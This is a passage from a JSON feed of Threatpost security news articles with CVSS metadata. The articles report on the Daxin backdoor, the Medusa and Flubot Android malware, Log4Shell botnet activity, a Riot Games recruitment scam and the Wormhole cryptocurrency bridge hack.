"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-01T18:09:38", "description": "The Daxin malware is taking aim at hardened government networks around the world, according to researchers, with the goal of cyberespionage.\n\nThe Symantec Threat Hunter team noticed the advanced persistent threat (APT) weapon in action in November, noting that it\u2019s \u201cthe most advanced piece of malware Symantec researchers have seen from [China-linked actors](<https://threatpost.com/victory-backdoor-apt-campaign/166700/>)\u2026exhibiting technical complexity previously unseen by such actors.\u201d\n\nThey added that Daxin\u2019s specific scope of operations includes reading and writing arbitrary files; starting and interacting with arbitrary processes; and advanced lateral movement and stealth capabilities.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) also flagged the activity, which Symantec characterized as \u201clong-running.\u201d The earliest known sample of the malware dates from 2013, when it already had a large part of the codebase fully developed.\n\n\u201cDaxin malware is a highly sophisticated rootkit backdoor with complex, stealthy command-and-control (C2) functionality that enabled remote actors to communicate with secured devices not connected directly to the internet,\u201d warned CISA, in a [Monday alert](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/28/broadcom-software-discloses-apt-actors-deploying-daxin-malware>). \u201cDaxin appears to be optimized for use against hardened targets, allowing the actors to deeply burrow into targeted networks and exfiltrate data without raising suspicions.\u201d\n\n## **Built for Stealth**\n\nFrom a technical standpoint, Daxin takes the form of a Windows kernel driver, according to Symantec\u2019s [Monday analysis](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage>), and has a focus on stealth.\n\n\u201cDaxin\u2019s capabilities suggest the attackers invested significant effort into developing communication techniques that can blend in unseen with normal network traffic on the target\u2019s network,\u201d the firm found. \u201cSpecifically, the malware avoids starting its own network services. Instead, it can abuse any legitimate services already running on the infected computers.\u201d\n\nIt communicates with legitimate services via network tunneling, they added \u2013 and further, it can set up daisy-chain communications, researchers added to move internally via hops between several linked computers.\n\n\u201cDaxin is also capable of relaying its communications across a network of infected computers within the attacked organization,\u201d they said. \u201cThe attackers can select an arbitrary path across infected computers and send a single command that instructs these computers to establish requested connectivity. This use case has been optimized by Daxin\u2019s designers.\u201d\n\nDaxin also can hijack legitimate TCP/IP connections. According to Symantec, it monitors all incoming TCP traffic for certain patterns, and when a preferred pattern is detected, it disconnects the legitimate recipient and takes over the connection.\n\n\u201cIt then performs a custom key exchange with the remote peer, where two sides follow complementary steps. The malware can be both the initiator and the target of a key exchange,\u201d according to the analysis. \u201cA successful key exchange opens an encrypted communication channel for receiving commands and sending responses. Daxin\u2019s use of hijacked TCP connections affords a high degree of stealth to its communications and helps to establish connectivity on networks with strict firewall rules. It may also lower the risk of discovery by SOC analysts monitoring for network anomalies.\u201d\n\nWhen all of this is put together, the result is that a single command message that includes all the details required to establish communication, specifically the node IP address, its TCP port number and the credentials to use during custom key exchange. When Daxin receives this message, it picks the next node from the list.\n\nThe research team linked Daxin to Chinese actors because it\u2019s usually deployed alongside tools known to be associated with Chinese espionage actors.\n\n\u201cMost of the targets appear to be organizations and governments of strategic interest to China,\u201d they added. \u201cDaxin is without doubt the most advanced piece of malware Symantec researchers have seen used by a China-linked actor.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _****_[FREE downloadable eBook](<https://bit.ly/3Jy6Bfs>)_****_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-01T17:55:46", "type": "threatpost", "title": "Daxin Espionage Backdoor Ups the Ante on Chinese Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-01T17:55:46", "id": "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "href": "https://threatpost.com/daxin-espionage-backdoor-chinese-malware/178706/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Flubot, the Android spyware that\u2019s been spreading virally since last year, has hitched its infrastructure wagon up to another mobile threat known as Medusa.\n\nThat\u2019s according to ThreatFabric, which found that Medusa is now being distributed through the same SMS-phishing infrastructure as Flubot, resulting in high-volume, side-by-side campaigns.\n\nThe Flubot malware (aka Cabassous) is delivered to targets through SMS texts that prompt them to install a \u201cmissed package delivery\u201d app or a faux version of Flash Player. If a victim falls for the ruse, the malware is installed, which adds the infected device to a botnet. Then, it sets about gaining permissions, stealing banking information and credentials, lifting passwords stored on the device and squirreling away various pieces of personal information.\n\nThe malicious implant also sends out additional text messages to the infected device\u2019s contact list, which allows it [to \u201cgo viral\u201d](<https://threatpost.com/threat-actors-androids-flubot-teabot-campaigns/177991/>) \u2013 like the flu.\n\nApparently, Medusa likes the cut of Flubot\u2019s jib: \u201cOur threat intelligence shows that Medusa followed with exactly the same app names, package names and similar icons,\u201d ThreatFabric researchers noted in a [Monday analysis](<https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html>). \u201cIn less than a month, this distribution approach allowed Medusa to reach more than 1,500 infected devices in one botnet, masquerading as DHL.\u201d\n\nAnd that\u2019s just for one botnet. ThreatFabric pointed out that Medusa has multiple botnets carrying out multiple campaigns.\n\nUnlike Flubot, which [mainly spreads](<https://threatpost.com/flubot-spyware-android-devices/165607/>) in Europe, Medusa is more of an equal-opportunity threat when it comes to geography. Recent campaigns have targeted users from Canada, Turkey and the United States.\n\n\u201cAfter targeting Turkish financial organizations in its first period of activity in 2020, Medusa has now switched its focus to North America and Europe, which results in [a] significant number of infected devices,\u201d ThreatFabric researchers noted. \u201cPowered with multiple remote-access features, Medusa poses a critical threat to financial organizations in targeted regions.\u201d\n\n## **Medusa Bursts on the Scene**\n\nFirst discovered in July 2020, Medusa (related to the Tanglebot family of RATs) is a mobile banking trojan that can gain near-complete control over a user\u2019s device, including capabilities for keylogging, banking trojan activity, and audio and video streaming. To boot, it has received several updates and improved in its obfuscation techniques as it hops on Flubot\u2019s infrastructure coattails, researchers said.\n\nFor one, it now has an accessibility-scripting engine that allows actors to perform a set of actions on the victim\u2019s behalf, with the help of Android Accessibility Service.\n\n\u201cBy abusing Accessibility Services, Medusa is able to execute commands on any app that is running on a victim\u2019s device,\u201d researchers noted. \u201cA command like \u2018fillfocus\u2019 allows the malware to set the text value of any specific text box to an arbitrary value chosen by the attacker, e.g., the beneficiary of a bank transfer.\u201d\n\nAccessibility events logging is a companion upgrade to the above. With a special command, Medusa can collect information about active windows, including the position of fields and certain elements within a user interface, any text inside those elements, and whether the field is a password field.\n\n\u201cHaving all the data collected the actor is able to get a better understanding of the interface of different applications and therefore implement relevant scenarios for accessibility scripting feature,\u201d according to ThreatFabric. \u201cMoreover, it allows actor(s) to have deeper insight on the applications the victim uses and their typical usage, while also [being able] to intercept some private data.\u201d\n\nThe following snippet shows the code that collects the information of active window going through its nodes:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/07171257/code-snippet.png>)\n\nSource: ThreatFabric.\n\nFurther, in examining Medusa\u2019s back-end panels, researchers observed the malware\u2019s operators marking banking apps with a \u201cBANK\u201d tag, to control/log the input fields.\n\n\u201cThis means that any banking app in the world is at risk to this attack, even those who do not fall within the current target list,\u201d they warned.\n\nThe command-and-control server (C2) can also command Medusa to carry out a wide variety of RAT work, including clicking on a specific UI element, sleeping, screenshotting, locking the screen, providing a list of recent apps and opening recent notifications.\n\n## **Flubot Evolves Its Capabilities**\n\nThe researchers also noticed that the addition of Medusa to the mix hasn\u2019t slowed down Flubot\u2019s own development. They explained that it now has a \u201cnovel capability never seen before in mobile banking malware.\u201d\n\nTo wit: In version 5.4, Medusa picked up the ability to abuse the \u201cNotification Direct Reply\u201d feature of Android OS, which allows the malware to directly reply to push notifications from targeted applications on a victim\u2019s device. The user isn\u2019t aware of the activity, so Flubot can thus intercept them \u2013 opening the door to thwarting two-factor authentication and more, researchers said.\n\n\u201cEvery minute the malware sends the statistics to the C2 about the notifications received,\u201d they explained. \u201cAs a response, it might receive a template string that will be used to re-create an object of intercepted notification with updated parameters, thus allowing [Flubot] authors to arbitrarily change notification content\u2026We believe that this previously unseen capability can be used by actors to sign fraudulent transactions on [a] victim\u2019s behalf, thus making notifications [a] non-reliable authentication/authorization factor on an infected device.\u201d\n\nAnother potential abuse of this functionality could be to respond to social-application interactions with \u201cnotifications\u201d containing malicious phishing links.\n\n\u201cConsidering the popularity of these type of apps and the strong focus of [Flubot] on distribution tactics, this could easily be the main MO behind this new Notification Direct Reply Abuse,\u201d according to ThreatFabric.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T22:13:29", "type": "threatpost", "title": "Medusa Malware Joins Flubot's Android Distribution Network", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T22:13:29", "id": "THREATPOST:10245D9804511A09607265485D240FFF", "href": "https://threatpost.com/medusa-malware-flubot-android-distribution/178258/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:15", "description": "Cybersecurity professionals across the world have been scrambling to shore up their systems against a critical [remote code-execution (RCE) flaw ](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) (CVE-2021-44228) in the Apache Log4j tool, discovered just days ago.\n\nNow under active exploit, the \u201cLog4Shell\u201d bug allows complete server takeover. Researchers have started to fill in the details on the latest Log4Shell attacks, and they reported finding at least 10 specific Linux botnets leading the charge.\n\nFirst, analysts at NetLab 360 detected two waves of [Log4Shell attacks](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) on their honeypots, from the Muhstik and Mirai botnets.\n\n## **Mirai Tweaked to Troll for Log4Shell Vulnerability **\n\nThe analysts at Netlab 360 said this is a new variant of Mirai with a few specific innovations. First, they pointed out the code piece \u201ctable_init/table_lock_val/table_unlock_val and other Mirai-specific configuration management functions have been removed.\u201d\n\nSecondly, they added, \u201cThe attack_init function is also discarded, and the DDoS attack function is called directly by the command-processing function.\u201d\n\nFinally, they found this iteration of the Mirai botnet uses a two-level domain for its command-and-control (C2) mechanis,, which the team at Netlab 360 said was \u201crare.\u201d\n\n## **Muhstik Variant Attacks Log4Shell **\n\nThe other Linux botnet launched to take advantage of the Apache 4j Library flaw is [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>), a Mirai variant.\n\n\u201cIn this captured sample, we note that the new Muhstik variant adds a backdoor module, ldm, which has the ability to add an SSH backdoor public key with the following installed backdoor public key,\u201d Netlab 360 reported.\n\nOnce added, the public key lets a threat actor log onto the server without so much as a password, they explained.\n\n\u201cMuhstik takes a blunt approach to spread the payload aimlessly, knowing that there will be vulnerable machines, and in order to know who has been infected, Muhstik adopts TOR network for its reporting mechanism,\u201d the Netlab 360 team said.\n\nFollowing detection of those attacks, the Netlab 360 team [found](<https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/>) other botnets on the hunt for the Log4Shell vulnerability including: DDoS family Elknot; mining family m8220; SitesLoader; xmrig.pe; xmring.ELF; attack tool 1; attack tool 2; plus one unknown and a PE family.\n\n## **Geography of Log4Shell Attacks **\n\nThe majority of [exploitation attempts against Log4Shell](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>) originate in Russia, according to Kaspersky researchers who found 4,275 attacks launched from Russia, by far the most of any other region. By comparison, 351 attempts were launched from China and 1,746 from the U.S.\n\nSo far, the [Apache Log4j logging library exploit](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) has spun off 60 mutations \u2014 and it only took less than a day.\n\nThis story is developing, so stay tuned to Threatpost for [additional coverage](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>).\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ _REGISTER TODAY_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ _LIVE, interactive Threatpost Town Hall_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. \n_** \n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ for the LIVE event!_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T19:00:01", "type": "threatpost", "title": "Where the Latest Log4Shell Attacks Are Coming From", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T19:00:01", "id": "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "href": "https://threatpost.com/log4shell-attacks-origin-botnet/176977/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:22", "description": "Riot Games, the developer behind League of Legends, has filed a California lawsuit against scammers, whose identities aren\u2019t yet known, for ripping off job seekers with the promise of a gig with the company.\n\nUsually early in their careers and eager for a chance with a gaming company like Riot, job hunters are either targeted by a cybercriminal posing as a recruiter or with fake ads on popular employment sites like Indeed, Riot\u2019s filing explained.\n\nThis email submitted as part of Riot\u2019s lawsuit includes a fake listing for a video game artist/illustrator.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10134745/riot-fraud-email-job-opening-.png>)\n\nSource:\n\nThen, the applicant is run through an imaginary interview process with questions that seem legit, like, \u201cWhy do you want to work at Riot Games?\u201d and, \u201cHonestly describe what kind of working conditions you thrive in.\u201d\n\nThe interview would often be conducted by chat and followed by a quick job offer.\n\nTo make things extra convincing, the fraudsters used contacts and other communications doctored-up with Riot branding, including convincing looking employment contracts.\n\nAfter the interview, there\u2019s just one step left for the interviewee \u2014 they are asked to send money for \u201cwork equipment\u201d like an iPad, which the interviewer assures the new hire will be refunded. Spoiler: they aren\u2019t going to be.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10135006/riot-text-ask-for-money.png>)\n\nSource: Polygon.\n\nRiot included copies of checks sent to the fraudsters by victims in its complaint, ranging from $2,400 to $4,300.\n\nRiot wasn\u2019t the only prominent gaming company used to lure in victims, Polygon reportedly heard from people approached by fake representatives of Rockstar Games and Manticore Games, according to its report.\n\n\u201c[The scam] is absolutely appalling,\u201d Riot\u2019s lawyers wrote in the complaint. \u201cTheir victims largely are young, na\u00efve, and want nothing more than to work for Riot, one of the most prestigious video-game companies in the world. Defendants prey on the hopes and dreams of these individuals in order to steal their identities and pillage their bank accounts.\u201d\n\nRiot Games representatives said in an interview with Polygon that the company isn\u2019t exactly sure how many people have already been [victimized by the phishing campaign](<https://www.polygon.com/22822273/riot-games-job-recruiting-scam-lawsuit>).\n\n## **Gamers and \u2018Dynamite Phishing\u2019 **\n\nPhishing lure themes are fickle, and ebb and flow with the latest headlines. COVID-19, [Chipotle offers](<https://threatpost.com/chipotle-serves-up-lures/168279/>), easy [infrastructure legislation money](<https://threatpost.com/attackers-impersonate-dot-phishing-scam/169484/>), and now, dream gaming jobs, are all bait intended to illicit an emotional reaction and make otherwise rational people take action without thinking it through.\n\nLast summer, the Threat Intelligence Team at GreatHorn discovered a rise in business email compromise (BEC) attacks that sent X-rated material to people at work to try and trigger an emotional response, something the report called \u201cdynamite phishing.\u201d\n\n\u201cIt doesn\u2019t always involve explicit material, but the goal is to put the user off balance, frightened \u2013 any excited emotional state \u2013 to decrease the brain\u2019s ability to make rational decisions,\u201d according to the report.\n\nA fantasy job at a huge gaming company could certainly trigger a highly emotional response in the right person.\n\nThis fake gaming company job scam leverages both the co-called [Great Resignation](<https://hbr.org/2021/09/who-is-driving-the-great-resignation>) of 2021, which saw record-breaking numbers of workers looking for better gigs, as well as the [pandemic push to work-from-home](<https://threatpost.com/2020-work-for-home-shift-learned/162595/>). Now a call from a personal cell phone number, or a Zoom interview in someone\u2019s kitchen, doesn\u2019t seem all that unusual and fraudsters are taking advantage.\n\nGaming itself is under relentless attack. Last summer, Akamai Technologies found [attacks on gaming](<https://threatpost.com/attackers-gaming-industry/167183/>) web applications alone jumped by a staggering 340 percent in 2020.\n\nFrom [Grinchbots](<https://threatpost.com/pandemic-grinchbots-surge-activity/176898/>) scooping up vast swaths of the latest hardware inventory to last month\u2019s [back-to-back PlayStation 5 breaches](<https://threatpost.com/playstation-5-hacks-same-day/176240/>) and [malicious gaming apps](<https://threatpost.com/9m-androids-malware-games-huawei-appgallery/176581/>) lurking in marketplaces, this latest fake job fraud is just another way criminals are trying to exploit the enthusiasm of gamers.\n\nNow Riot hopes to use this lawsuit as a way to track down the cybercriminals and make it clear the company was not behind the scam, according to Riot attorney Dan Nabel.\n\n\u201cWe\u2019re upset that people who viewed Riot as their dream company, even if that\u2019s one person, had been defrauded through this scam,\u201d Nabel told Polygon. \u201cSecondarily, we felt a need to protect our employees who are having their identities impersonated.\u201d\n\n_**There\u2019s a sea of unstructured data on the internet relating to the latest security threats. **_[**_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This **_[**_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_**, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken.**_\n\n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ for the LIVE event!_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T19:00:36", "type": "threatpost", "title": "'Appalling' Riot Games Job Fraud Takes Aim at Wallets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T19:00:36", "id": "THREATPOST:065F7608AC06475E765018E97F14998D", "href": "https://threatpost.com/riot-games-job-fraud/176950/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Wormhole \u2013 a web-based blockchain \u201cbridge\u201d that enables users to convert cryptocurrencies \u2013 said on Thursday that \u201call funds are safe\u201d after attackers abused a vulnerability to shake it down for 120,000 Ethereum (approximately $314 million).\n\nIn a postmortem shared with Threatpost on Thursday, blockchain security and smart-auditing company CertiK said that its preliminary analysis indicates that \u201cthe attacker exploited a mint function on the Solana side of the Wormhole bridge to create 120,000 wETH [wrapped Ethereum] for themselves, then used these minted tokens to claim ETH that was held on the Ethereum side of the bridge.\u201d\n\nAs far as negotiation attempts go, CertiK said that the Wormhole team left a message to the attacker stating, \u201cWe noticed you were able to exploit the Solana VAA verification and mint tokens. We\u2019d like to offer you a white-hat agreement, and present you a bug bounty of $10 million for exploit details, and return the wETH you\u2019ve minted. You can reach out to us at[ contact@certus.one](<https://t.nylas.com/t1/222/6go6zh11n354zj4gtfyydtk2j/0/7e3f0565dba6ac71abf6ccdb740c5697cd8db828b0852af88c0c054ee28bb3c2>).\u201d\n\nIts total on the heist differs a bit from that of Wormhole: CertiK\u2019s analysis showed that the attacker got away with 93,750 ETH ($251 million), 432,662 SOL ($46.6 million) and 4.14 million in USD Coin (USDC) ($4.14 million), for a total of $302,495,717.\n\nThis is the [second-largest hack](<https://defiyield.app/rekt-database>) of a decentralized finance (DeFi) platform, second only to the Poly Network (ETH) exploit, in which an attacker ripped off about $602 million. That attacker reportedly went on to [pay it back](<https://threatpost.com/poly-network-recoups-610m-stolen-from-defi-platform/168906/>), however, after accepting a gig as chief security advisor with Poly Network.\n\nIn an early-morning [tweet](<https://twitter.com/wormholecrypto/status/1489233259808571401>) on Thursday, the official Wormhole Twitter account confirmed that it had been raided for 120,000 ETH, but that the vulnerability is now patched.\n\n> 1/2\n> \n> All funds have been restored and Wormhole is back up.\n> \n> We're deeply grateful for your support and thank you for your patience.\n> \n> \u2014 Wormhole\ud83c\udf2a (@wormholecrypto) [February 3, 2022](<https://twitter.com/wormholecrypto/status/1489232008521859079?ref_src=twsrc%5Etfw>)\n\nWormhole\u2019s Portal \u2013 its token bridge \u2013 was back up as of 13:29 UTC, the team said.\n\n## A \u2018Rather Common\u2019 Programming Error\n\nRoger Grimes, data driven defense evangelist for KnowBe4, told Threatpost on Thursday that the attack was successful because of what he called a \u201crather common\u201d programming error.\n\n\u201cThe function inside of the multiple nested smart contracts which was supposed to verify the signature was not coded to ensure the integrity check actually happened,\u201d he exlained via email. \u201cSo there was no integrity guaranteed in the integrity check. Yeah, that is a problem.\u201d\n\n## Why So Popular?\n\nCertiK said that the bridge\u2019s popularity meant that it had become the dominant bridge between Solana and Ethereum, \u201cand as such was responsible for a large proportion of all wrapped Ethereum on the Solana blockchain.\u201d\n\n020322 14:54 UPDATE: Added CertiK\u2019s analysis of Wormhole\u2019s 1:1 ratio of ETH to wETH. \n\nAs CertiK explained in its postmortem, the bridge held a 1:1 ratio of ETH to wETH, \u201cacting essentially as an escrow service.\u201d But the theft broke that 1:1 peg, leading to what CertiK said was \u201cat least 93,750 less ETH held as collateral.\u201d\n\nIt didn\u2019t bode well for the financial health of Solana, the firm pointed out. If that ratio hadn\u2019t been regained, DeFi on Solana was at risk of \u201ca mass liquidation event,\u201d according to the its analysis.\n\nBut given that Wormhole on Thursday indicated that its backers \u2013 whoever they may be \u2013 had put up the funds necessary to return the peg to a 1:1 backing, the collateralization of wETH on Solana was restored. \n\nAll well and good, but still, investors\u2019 gonads shrunk in response to the massive heist: The price of Solana, which outpaced both Bitcoin and Ethereum last year, was in [freefall](<https://www.forbes.com/sites/billybambrough/2022/02/03/crypto-price-alert-ethereum-rival-solana-suddenly-in-free-fall-after-huge-325-million-hack/?sh=442f39b04bb5>) Thursday morning. It was selling at $97.69 as of 12:50 ET, down 10 percent since the details of the theft were revealed. Solana had hit a high of $260 in November 2021. Ethereum is also giving investors the hives, having dropped about 5 percent as of the same time on Thursday.\n\nAt this point, the full extent of this attack \u201cstill remains to be seen,\u201d CertiK said. It could turn out to be a precursor to other attacks, the firm suggested, if, for example, Wormhole\u2019s bridge to a different cryptocurrency \u2013 the Terra blockchain \u2013 shares the same vulnerability as its Solana bridge.\n\n## Who Bailed Out Wormhole?\n\nThe Wormhole team didn\u2019t specify who dug into what must be some seriously deep pockets to back-fill all that money. The Twitterverse, of course, had hypotheses, including that perhaps it was Alameda Research: a cryptocurrency quantitative trading firm and liquidity provider that claims to \u201cmanage over $70 million in digital assets and trade around $1 billion per day across thousands of products: all major coins and altcoins, and their derivatives.\u201d\n\n\u201cIt was either dilute their equity to infinity with $300 million bail out or watch all of Solana ecosystem crash and burn (which would have costed Alameda more than $300 million on their books),\u201d suggested one Twitter user.\n\n> Alameda probably bailed them out, it was either dilute their equity to infinity with $300 million bail out or watch all of Solana ecosystem crash and burn (which would have costed Alameda more than $300 million on their books)\n> \n> \u2014 ichioku (@1chioku) [February 3, 2022](<https://twitter.com/1chioku/status/1489240858017021956?ref_src=twsrc%5Etfw>)\n\nAlameda hasn\u2019t made a public statement on the matter. Wormhole has promised a detailed incident report as soon as possible.\n\n## Crypto\u2019s Cutting Edge Gets a Nasty Cut\n\nRonghui Gu, co-founder and professor of CertiK, told Threatpost on Thursday that clearly this Wormhole exploit isn\u2019t the first of its kind, and obviously, it won\u2019t be the last.\n\n\u201cWe saw another cross-chain bridge exploited less than a week ago, when Qubit Finance lost $80 million,\u201d Gu pointed out, referring to an attack [confirmed](<https://blockworks.co/defi-protocol-qubit-finance-loses-80m-in-hack/#:~:text=Hackers%20have%20stolen%20%2480%20million,ever%2C%20DeFiYield%20Rekt%20data%20shows.>) by the DeFi protocol Qubit Finance on Friday.\n\nThe attackers reportedly made off with 206,809 Binance coins through Qubit\u2019s QBridge deposit function, making it the seventh-largest DeFi hack ever.\n\nExpect more of the same when it comes to bridge exploits, Gu said, given insatiable demand for these technologies. \u201cWe seem to be at an awkward point where the demand for cross-chain infrastructure is far outpacing the industry\u2019s ability to build services securely,\u201d he told Threatpost via email.\n\nOf course, there\u2019s always the \u201cbecause that\u2019s where the money is\u201d rationale, Gu noted: \u201cBridges are an attractive target for hackers: they hold millions of dollars of tokens in what is essentially an escrow contract, and by operating across multiple chains they multiply their potential points of failure.\u201d\n\nThreat actors follow the money, he said, and those on the cutting edge of cryptocurrency technology can get bumped off as a result: \u201cA lot of money goes to the newest, most exciting ecosystems. The price that the most adventurous DeFi explorers pay is a heightened risk of falling victim to these exploits of innovative but ultimately insecure platforms.\u201d\n\n## A Need for Secure Development Lifecycle\n\nWhere there is software, there are bugs. Grimes pointed to the attack as being a case in point about the need for training in secure development lifecycle (SDL) coding. \u201cSDL teaches developers about common exploitable bugs and how to avoid putting it into their own code,\u201d he explained. 